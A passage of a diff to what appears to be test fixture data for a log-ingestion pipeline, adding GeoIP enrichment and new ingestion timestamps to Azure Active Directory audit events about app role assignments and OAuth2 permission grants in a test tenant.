APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -17086,6 +18166,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -17252,7 +18344,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125361200Z", + "ingested": "2021-12-14T14:48:43.176741458Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17279,6 +18371,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -17445,7 +18549,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125367600Z", + "ingested": "2021-12-14T14:48:43.176742035Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17472,6 +18576,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -17638,7 +18754,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125374Z", + "ingested": "2021-12-14T14:48:43.176742709Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17665,6 +18781,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -17834,7 +18962,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125380300Z", + "ingested": "2021-12-14T14:48:43.176743236Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\